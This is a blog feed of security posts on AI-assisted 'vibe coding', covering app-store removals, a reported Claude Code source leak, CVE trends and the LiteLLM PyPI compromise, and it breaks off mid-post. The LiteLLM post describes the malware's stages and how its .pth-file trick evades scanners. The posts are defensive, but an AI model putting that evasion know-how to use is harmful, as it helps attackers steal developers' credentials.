<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Not Elon</title>
    <description>The latest articles on DEV Community by Not Elon (@solobillions).</description>
    <link>https://dev.to/solobillions</link>
    
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/solobillions"/>
    <language>en</language>
    <item>
      <title>Apple Just Killed a $100M Vibe Coding App. Here's the Security Angle Nobody's Talking About.</title>
      <dc:creator>Not Elon</dc:creator>
      <pubDate>Thu, 02 Apr 2026 04:35:18 +0000</pubDate>
      <link>https://dev.to/solobillions/apple-just-killed-a-100m-vibe-coding-app-heres-the-security-angle-nobodys-talking-about-4hmp</link>
      <guid>https://dev.to/solobillions/apple-just-killed-a-100m-vibe-coding-app-heres-the-security-angle-nobodys-talking-about-4hmp</guid>
      <description>&lt;p&gt;Last week, Apple removed "Anything" from the App Store. The startup had raised $11M at a $100M valuation. Gone overnight.&lt;/p&gt;

&lt;p&gt;Replit and Vibecode are also blocked from releasing updates.&lt;/p&gt;

&lt;p&gt;The tech press is calling it anticompetitive. X is full of takes about Apple killing innovation. The narrative is simple: Apple wants you to use Xcode with their AI tools, not third-party vibe coding apps.&lt;/p&gt;

&lt;p&gt;But here's what nobody's talking about: &lt;strong&gt;Apple cited Guideline 2.5.2&lt;/strong&gt;. And that's a security rule, not a competition rule.&lt;/p&gt;

&lt;h2&gt;
  
  
  What Guideline 2.5.2 Actually Says
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;"Apps should be self-contained in their bundles, and may not read or write data outside the designated container area, nor may they download, install, or execute code which introduces or changes features or functionality of the app."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Vibe coding apps, by definition, do exactly what this rule prohibits. They download code, execute it, and change app functionality on the fly. That's the entire product.&lt;/p&gt;

&lt;p&gt;This isn't arbitrary. The rule exists because dynamic code execution is a security nightmare.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Security Data Nobody's Citing
&lt;/h2&gt;

&lt;p&gt;While everyone debates whether Apple is being anticompetitive, here's what's happening in the vibe coding security space:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;35 new CVEs in March 2026&lt;/strong&gt; traced directly to AI-generated code vulnerabilities&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;escape.tech&lt;/strong&gt; scanned 5,600 live vibe-coded apps and found hundreds with exposed API keys and secrets&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;UK's NCSC CEO&lt;/strong&gt; called for vibe coding safeguards at RSA Conference this week&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Trend Micro&lt;/strong&gt; published their vibe coding risk analysis yesterday, calling it a "real and growing threat"&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Harvard Gazette&lt;/strong&gt; ran a piece today noting that vibe coders "don't typically need to concern themselves" with reliability, safety, and security&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The problem is real. The question is whether banning apps is the right solution.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why Vibe Coding Apps Are Uniquely Risky on iOS
&lt;/h2&gt;

&lt;p&gt;Traditional iOS apps go through App Review. Apple scans them for malware, policy violations, and common security issues.&lt;/p&gt;

&lt;p&gt;Vibe coding apps bypass this by generating code on-device after approval. The app that passes review is not the app users actually run. Whatever Claude or Codex generates next week isn't subject to any review.&lt;/p&gt;

&lt;p&gt;This creates a few problems:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Prompt injection attacks&lt;/strong&gt; can generate malicious code without user awareness&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Supply chain vulnerabilities&lt;/strong&gt; in the underlying LLMs propagate to every app built with them&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No static analysis is possible&lt;/strong&gt; on code that doesn't exist until runtime&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Exposed secrets&lt;/strong&gt; are common because vibe coders often don't know to protect them&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Apple's Real Mistake
&lt;/h2&gt;

&lt;p&gt;Apple is right that there's a security problem. They're wrong about the solution.&lt;/p&gt;

&lt;p&gt;Banning apps doesn't fix the underlying vulnerability. It just pushes vibe coding to the web, where the same apps can run without any review at all.&lt;/p&gt;

&lt;p&gt;A better approach:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Sandbox the generated code&lt;/strong&gt; more aggressively&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Require on-device code review&lt;/strong&gt; before execution&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Mandate secret scanning&lt;/strong&gt; before deployment&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Create a certification program&lt;/strong&gt; for vibe coding platforms that meet security standards&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Instead, Apple took the easy path: ban first, figure it out later.&lt;/p&gt;

&lt;h2&gt;
  
  
  What This Means for Vibe Coders
&lt;/h2&gt;

&lt;p&gt;If you're building with Lovable, Bolt, Cursor, or any other AI coding tool:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Your iOS distribution options just narrowed&lt;/strong&gt;. Web apps and PWAs are still fine. Native iOS apps generated by vibe coding tools face an uncertain future.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Security scanning is now mandatory&lt;/strong&gt;. If you're shipping anything, you need to run a security scan. Tools like &lt;a href="https://notelon.ai" rel="noopener noreferrer"&gt;VibeCheck&lt;/a&gt;, Aikido, or ChakraView can catch exposed secrets and common vulnerabilities.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;The regulatory spotlight is coming&lt;/strong&gt;. If Apple is cracking down, expect the EU, UK, and others to start asking questions about AI-generated code quality.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The vibe coding gold rush isn't over. But the "ship fast, worry later" phase might be.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Building something with AI coding tools? &lt;a href="https://notelon.ai" rel="noopener noreferrer"&gt;VibeCheck&lt;/a&gt; is a free security scanner for vibe-coded apps. Paste your GitHub URL or deployed site, get a security grade in seconds.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Follow &lt;a href="https://x.com/solobillionsHQ" rel="noopener noreferrer"&gt;@solobillionsHQ&lt;/a&gt; for daily vibe coding security updates.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>ai</category>
      <category>webdev</category>
      <category>startup</category>
    </item>
    <item>
      <title>Anthropic Just Leaked Claude Code's Source. Here's What It Means for Your Vibe-Coded App.</title>
      <dc:creator>Not Elon</dc:creator>
      <pubDate>Tue, 31 Mar 2026 23:04:23 +0000</pubDate>
      <link>https://dev.to/solobillions/anthropic-just-leaked-claude-codes-source-heres-what-it-means-for-your-vibe-coded-app-1alf</link>
      <guid>https://dev.to/solobillions/anthropic-just-leaked-claude-codes-source-heres-what-it-means-for-your-vibe-coded-app-1alf</guid>
      <description>&lt;p&gt;Georgia Tech researchers just dropped a stat that should scare every vibe coder: &lt;strong&gt;35 new CVEs in March 2026 were traced directly to AI-generated code.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;But today, Anthropic proved the point better than any research paper could.&lt;/p&gt;

&lt;h2&gt;
  
  
  What Happened
&lt;/h2&gt;

&lt;p&gt;Anthropic accidentally shipped a 59.8 MB JavaScript source map file in version 2.1.88 of their Claude Code npm package. That single file exposed the entire codebase: &lt;strong&gt;512,000 lines of TypeScript&lt;/strong&gt;, internal architecture details, 44 hidden feature flags, 20 unshipped features, and the exact prompts used to control the AI agent.&lt;/p&gt;

&lt;p&gt;Within hours, the code was mirrored across GitHub, forked into open-source alternatives, and analyzed by thousands of developers. Anthropic confirmed it was "a release packaging issue caused by human error."&lt;/p&gt;

&lt;p&gt;Human error. A source map in production. The exact same mistake AI coding tools make in your app every day.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why This Matters More Than You Think
&lt;/h2&gt;

&lt;p&gt;This isn't just an Anthropic story. It's a pattern.&lt;/p&gt;

&lt;p&gt;Anthropic is a $30B company with a $2.5B ARR product. They have security teams, code review processes, and CI/CD pipelines. And a source map still made it to production.&lt;/p&gt;

&lt;p&gt;Now think about what's shipping in the average vibe-coded app built with Lovable, Bolt, or Cursor:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Source maps in production builds&lt;/strong&gt; (the exact same error Anthropic made)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;.env&lt;/code&gt; files committed to public repos&lt;/strong&gt; (your database credentials, API keys)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Debug endpoints left active&lt;/strong&gt; (admin panels, test routes with no auth)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Hardcoded secrets in client-side code&lt;/strong&gt; (visible to anyone who opens DevTools)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No &lt;code&gt;.gitignore&lt;/code&gt; for sensitive files&lt;/strong&gt; (lockfiles, build artifacts, config files with credentials)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;These aren't theoretical. We see them in real apps every day.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Pattern: Three Major AI Toolchain Incidents This Month
&lt;/h2&gt;

&lt;p&gt;March 2026 was brutal for AI security:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;LiteLLM supply chain attack&lt;/strong&gt; (March 25): A backdoored package on PyPI got 47,000 downloads in 46 minutes. The same attacker also poisoned Telnyx (742K monthly downloads). Malware was hidden in a WAV file.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;trivy-action poisoned&lt;/strong&gt; (March 14): A GitHub Action used for security scanning was itself compromised. The tool meant to protect you became the attack vector.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Claude Code source leak&lt;/strong&gt; (March 31): 512,000 lines of production code exposed via a source map in an npm package. The AI coding tool leaked its own source code.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The tools we use to build and secure AI-generated code are themselves becoming the attack surface.&lt;/p&gt;

&lt;h2&gt;
  
  
  What the Leaked Code Actually Revealed
&lt;/h2&gt;

&lt;p&gt;For anyone building AI agents or using Claude Code, the leaked source exposed:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;A profanity flagging system&lt;/strong&gt; that quietly records flagged content&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;44 hidden feature flags&lt;/strong&gt; controlling unreleased capabilities&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;A three-layer memory architecture&lt;/strong&gt; (MEMORY.md index, topic files, grep-based transcript search)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Verification agent prompts&lt;/strong&gt; that explicitly call out Claude's tendency to claim it verified something without actually running the check&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;That last one is telling. Anthropic's own internal prompts say: "reading is not verification. run it." They know their model takes shortcuts. Your vibe-coded app is built by that same model.&lt;/p&gt;

&lt;h2&gt;
  
  
  What You Should Do Right Now
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Check your builds for source maps:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Find source map files in your build output&lt;/span&gt;
find ./dist &lt;span class="nt"&gt;-name&lt;/span&gt; &lt;span class="s2"&gt;"*.map"&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; &lt;span class="nt"&gt;-name&lt;/span&gt; &lt;span class="s2"&gt;"*.js.map"&lt;/span&gt;

&lt;span class="c"&gt;# Check if your bundler is generating source maps for production&lt;/span&gt;
&lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s2"&gt;"sourcemap|sourceMap|devtool"&lt;/span&gt; webpack.config.&lt;span class="k"&gt;*&lt;/span&gt; vite.config.&lt;span class="k"&gt;*&lt;/span&gt; next.config.&lt;span class="k"&gt;*&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Check for exposed secrets:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Search for hardcoded API keys and credentials&lt;/span&gt;
&lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-rn&lt;/span&gt; &lt;span class="s2"&gt;"sk-|api_key|password|secret|token"&lt;/span&gt; &lt;span class="nt"&gt;--include&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"*.ts"&lt;/span&gt; &lt;span class="nt"&gt;--include&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"*.js"&lt;/span&gt; &lt;span class="nt"&gt;--include&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"*.env"&lt;/span&gt; &lt;span class="nb"&gt;.&lt;/span&gt;

&lt;span class="c"&gt;# Make sure .env is in .gitignore&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; .gitignore | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="nb"&gt;env&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Check your npm packages:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# See what files are included in your package&lt;/span&gt;
npm pack &lt;span class="nt"&gt;--dry-run&lt;/span&gt;

&lt;span class="c"&gt;# Add min-release-age to block new packages for 7 days&lt;/span&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"min-release-age=7"&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; ~/.npmrc
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Or scan your whole app in 30 seconds:&lt;/strong&gt; &lt;a href="https://notelon.ai" rel="noopener noreferrer"&gt;notelon.ai&lt;/a&gt; checks for source maps, exposed secrets, missing auth, and the other common vibe coding mistakes. Free. No signup.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Lesson
&lt;/h2&gt;

&lt;p&gt;Anthropic has 1,000+ employees, dedicated security teams, and enterprise compliance requirements. They still shipped a source map to production.&lt;/p&gt;

&lt;p&gt;You're one person with an AI coding tool. What's in YOUR production build right now?&lt;/p&gt;

&lt;p&gt;The gap between code generation speed and security review isn't closing. It's accelerating. 35 new CVEs from AI code in March. The tools themselves are becoming attack vectors. And the developers who need security most are the ones least likely to check.&lt;/p&gt;

&lt;p&gt;Don't be the next leak. Scan your code before someone else does.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Sources: &lt;a href="https://venturebeat.com/technology/claude-codes-source-code-appears-to-have-leaked-heres-what-we-know" rel="noopener noreferrer"&gt;VentureBeat&lt;/a&gt;, &lt;a href="https://arstechnica.com/ai/2026/03/entire-claude-code-cli-source-code-leaks-thanks-to-exposed-map-file/" rel="noopener noreferrer"&gt;Ars Technica&lt;/a&gt;, &lt;a href="https://fortune.com/2026/03/31/anthropic-source-code-claude-code-data-leak-second-security-lapse-days-after-accidentally-revealing-mythos/" rel="noopener noreferrer"&gt;Fortune&lt;/a&gt;, &lt;a href="https://www.infosecurity-magazine.com/news/ai-generated-code-vulnerabilities/" rel="noopener noreferrer"&gt;Infosecurity Magazine&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>programming</category>
    </item>
    <item>
      <title>35 New CVEs in March From AI-Generated Code: The Numbers Are Getting Worse</title>
      <dc:creator>Not Elon</dc:creator>
      <pubDate>Tue, 31 Mar 2026 17:08:44 +0000</pubDate>
      <link>https://dev.to/solobillions/35-new-cves-in-march-from-ai-generated-code-the-numbers-are-getting-worse-1nm7</link>
      <guid>https://dev.to/solobillions/35-new-cves-in-march-from-ai-generated-code-the-numbers-are-getting-worse-1nm7</guid>
      <description>&lt;p&gt;Georgia Tech researchers just dropped a stat that should scare every vibe coder: &lt;strong&gt;35 new CVEs in March 2026 were traced directly to AI-generated code.&lt;/strong&gt; That's up from 6 in January and 15 in February.&lt;/p&gt;

&lt;p&gt;The trend line is vertical.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Vibe Security Radar
&lt;/h2&gt;

&lt;p&gt;The &lt;a href="https://vibe-radar-ten.vercel.app/" rel="noopener noreferrer"&gt;Vibe Security Radar&lt;/a&gt; is a research project from Georgia Tech's Systems Software &amp;amp; Security Lab. They track vulnerabilities specifically introduced by AI coding tools that made it into public advisories (CVE.org, NVD, GitHub Advisory Database, OSV, RustSec).&lt;/p&gt;

&lt;p&gt;Their method:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Pull from public vulnerability databases&lt;/li&gt;
&lt;li&gt;Find the commit that fixed each vulnerability&lt;/li&gt;
&lt;li&gt;Trace backwards to find who introduced the bug&lt;/li&gt;
&lt;li&gt;If the commit has an AI tool's signature (co-author tag, bot email), flag it&lt;/li&gt;
&lt;li&gt;AI agents investigate the root cause using actual Git history&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;74 confirmed cases so far.&lt;/strong&gt; The real number is estimated at 5-10x higher (400-700 across open source) because tools like Copilot leave no metadata traces.&lt;/p&gt;

&lt;h2&gt;
  
  
  Which Tools Introduce the Most Vulnerabilities?
&lt;/h2&gt;

&lt;p&gt;Claude Code shows up the most in the data, but the lead researcher Hanqing Zhao says that's mostly because Claude "always leaves a signature." Copilot's inline suggestions leave no trace.&lt;/p&gt;

&lt;p&gt;They track approximately &lt;strong&gt;50 AI-assisted coding tools&lt;/strong&gt;: Claude Code, GitHub Copilot, Cursor, Devin, Windsurf, Aider, Amazon Q, Google Jules, and more.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why This Matters for Vibe Coders
&lt;/h2&gt;

&lt;p&gt;Here's the context that makes this urgent:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;NCSC Warning&lt;/strong&gt;: The UK's National Cyber Security Centre CEO called for vibe coding safeguards at RSA Conference this week&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;escape.tech Data&lt;/strong&gt;: 5,600 live vibe-coded apps scanned, hundreds of vulnerabilities and exposed secrets found&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Supply Chain Attacks&lt;/strong&gt;: LiteLLM's PyPI package was backdoored (47K downloads in 46 minutes). The same attacker poisoned trivy-action, a security scanner itself&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Only 18%&lt;/strong&gt; of organizations can fix security vulnerabilities at the pace AI generates them (InformationWeek)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The gap between code generation speed and security review capacity is widening every month.&lt;/p&gt;

&lt;h2&gt;
  
  
  The 4 Most Common AI Code Vulnerabilities
&lt;/h2&gt;

&lt;p&gt;Based on our analysis of hundreds of vibe-coded apps at &lt;a href="https://notelon.ai" rel="noopener noreferrer"&gt;VibeCheck&lt;/a&gt;:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Hardcoded secrets&lt;/strong&gt; in source code (API keys, database credentials in plaintext)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No input validation&lt;/strong&gt; before database queries (SQL injection, NoSQL injection)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Missing authentication&lt;/strong&gt; on API endpoints (anyone can call them)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No rate limiting&lt;/strong&gt; on auth endpoints (brute force attacks trivial)&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;AI coding tools generate functional code. They rarely generate secure code. The difference kills you in production.&lt;/p&gt;

&lt;h2&gt;
  
  
  What You Can Do Right Now
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;For your dependencies:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight conf"&gt;&lt;code&gt;&lt;span class="c"&gt;# .npmrc - block new packages for 7 days
&lt;/span&gt;&lt;span class="n"&gt;min&lt;/span&gt;-&lt;span class="n"&gt;release&lt;/span&gt;-&lt;span class="n"&gt;age&lt;/span&gt;=&lt;span class="m"&gt;7&lt;/span&gt;

&lt;span class="c"&gt;# uv.toml - same for Python
&lt;/span&gt;&lt;span class="n"&gt;exclude&lt;/span&gt;-&lt;span class="n"&gt;newer&lt;/span&gt; = &lt;span class="s2"&gt;"7 days"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Most malicious packages get caught within 24-72 hours. A 7-day buffer kills the majority of supply chain attacks.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;For your code:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Pin exact versions with lockfiles and hashes&lt;/li&gt;
&lt;li&gt;Never hardcode secrets (use environment variables)&lt;/li&gt;
&lt;li&gt;Add input validation on every endpoint that touches a database&lt;/li&gt;
&lt;li&gt;Rate limit authentication endpoints&lt;/li&gt;
&lt;li&gt;Run a security scan before deploying&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Free scanner:&lt;/strong&gt; &lt;a href="https://notelon.ai" rel="noopener noreferrer"&gt;notelon.ai&lt;/a&gt; checks for the common vibe coding mistakes. Paste your repo or URL, get results in seconds. No signup required.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Trend Is Clear
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Month&lt;/th&gt;
&lt;th&gt;CVEs from AI Code&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Jan 2026&lt;/td&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Feb 2026&lt;/td&gt;
&lt;td&gt;15&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Mar 2026&lt;/td&gt;
&lt;td&gt;35&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;That's a 150% month-over-month increase in February, then 133% in March. If this trajectory holds, April could see 70+.&lt;/p&gt;

&lt;p&gt;The tools that generate code are getting faster. The tools that secure it aren't keeping up. That gap is the vulnerability.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Sources: &lt;a href="https://www.infosecurity-magazine.com/news/ai-generated-code-vulnerabilities/" rel="noopener noreferrer"&gt;Infosecurity Magazine&lt;/a&gt;, &lt;a href="https://vibe-radar-ten.vercel.app/" rel="noopener noreferrer"&gt;Georgia Tech Vibe Security Radar&lt;/a&gt;, &lt;a href="https://www.ncsc.gov.uk/news/ncsc-ceo-seize-disruptive-vibe-coding-opportunity-to-make-software-more-secure" rel="noopener noreferrer"&gt;NCSC&lt;/a&gt;, &lt;a href="https://www.informationweek.com/machine-learning-ai/vibe-coding-speed-without-security-is-a-liability" rel="noopener noreferrer"&gt;InformationWeek&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

</description>
      <category>webdev</category>
    </item>
    <item>
      <title>The LiteLLM Supply Chain Attack: Why Vibe Coders Are the Most Exposed</title>
      <dc:creator>Not Elon</dc:creator>
      <pubDate>Tue, 31 Mar 2026 00:32:54 +0000</pubDate>
      <link>https://dev.to/solobillions/the-litellm-supply-chain-attack-why-vibe-coders-are-the-most-exposed-342d</link>
      <guid>https://dev.to/solobillions/the-litellm-supply-chain-attack-why-vibe-coders-are-the-most-exposed-342d</guid>
      <description>&lt;p&gt;On March 24, 2026, someone slipped malicious code into LiteLLM versions 1.82.7 and 1.82.8 on PyPI. LiteLLM gets 95 million downloads per month. It's the library that lets you route requests across LLM providers through a single API.&lt;/p&gt;

&lt;p&gt;If you're vibe coding with any AI tool that uses LiteLLM under the hood, this affects you directly.&lt;/p&gt;

&lt;h2&gt;
  
  
  What Happened
&lt;/h2&gt;

&lt;p&gt;The attacker (tracked as TeamPCP by Endor Labs) injected 12 lines of code into &lt;code&gt;proxy_server.py&lt;/code&gt;. The code executes the moment the module is imported. No user interaction needed.&lt;/p&gt;

&lt;p&gt;Version 1.82.8 went further: it added a &lt;code&gt;.pth&lt;/code&gt; file that runs the payload on &lt;strong&gt;any Python invocation&lt;/strong&gt;, even if you never import LiteLLM. Just having it installed is enough.&lt;/p&gt;

&lt;p&gt;The payload runs a three-stage attack:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Harvests credentials&lt;/strong&gt;: SSH keys, cloud tokens, Kubernetes secrets, crypto wallets, and &lt;code&gt;.env&lt;/code&gt; files&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Lateral movement&lt;/strong&gt;: Deploys privileged pods across Kubernetes clusters&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Persistence&lt;/strong&gt;: Installs a systemd backdoor that polls for additional binaries&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Everything gets encrypted and exfiltrated to an attacker-controlled domain.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why Vibe Coders Are Most Exposed
&lt;/h2&gt;

&lt;p&gt;This is the part that matters if you're building with Cursor, Lovable, Bolt, or Replit.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;No lockfiles.&lt;/strong&gt; Most vibe coders run &lt;code&gt;pip install litellm&lt;/code&gt; without version pinning. Whatever is latest on PyPI is what you get. The compromised versions were live for 46 minutes before being pulled. That's 47,000 downloads.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;No dependency auditing.&lt;/strong&gt; When your AI coding tool adds a package, do you check what version? Do you verify hashes? Most vibe coders don't even know what packages their AI added to requirements.txt.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Trust inheritance.&lt;/strong&gt; Your AI coding tool has access to your environment variables, API keys, and cloud credentials. A compromised dependency inherits all of that access. The attacker didn't need to break your code. They broke a library your code trusts.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The &lt;code&gt;.pth&lt;/code&gt; file trick.&lt;/strong&gt; This is particularly nasty. Python's &lt;code&gt;.pth&lt;/code&gt; files execute at interpreter startup. Security scanners that check import-time execution wouldn't catch it. Static analysis tools that flag &lt;code&gt;exec()&lt;/code&gt; and &lt;code&gt;eval()&lt;/code&gt; wouldn't catch it either, because the payload uses &lt;code&gt;subprocess.run()&lt;/code&gt; instead.&lt;/p&gt;

&lt;h2&gt;
  
  
  This Isn't an Isolated Incident
&lt;/h2&gt;

&lt;p&gt;TeamPCP has been running a month-long campaign across five ecosystems:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;GitHub Actions&lt;/strong&gt;: Compromised Aqua Security's Trivy (a vulnerability scanner)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Docker Hub&lt;/strong&gt;: Compromised Checkmarx's KICS (infrastructure-as-code analyzer)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;npm&lt;/strong&gt;: CanisterWorm malware&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;OpenVSX&lt;/strong&gt;: VS Code extension supply chain&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;PyPI&lt;/strong&gt;: LiteLLM (this attack)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Notice the pattern? They're specifically targeting &lt;strong&gt;security tools&lt;/strong&gt;. The tools developers trust to keep them safe are the attack vector.&lt;/p&gt;

&lt;h2&gt;
  
  
  What You Should Do Right Now
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1. Check if you're affected
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;pip show litellm | &lt;span class="nb"&gt;grep &lt;/span&gt;Version
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If you see 1.82.7 or 1.82.8, you need to assume compromise. Rotate ALL credentials immediately.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Pin your dependencies
&lt;/h3&gt;

&lt;p&gt;Stop installing latest. Use a lockfile with hashes.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;litellm==1.82.6 --hash=sha256:&amp;lt;verified_hash&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  3. Audit your requirements.txt
&lt;/h3&gt;

&lt;p&gt;Look at what your AI coding tool added. Do you know what every package does? If not, you have blind trust in your dependency tree.&lt;/p&gt;

&lt;h3&gt;
  
  
  4. Use &lt;code&gt;pip audit&lt;/code&gt;
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
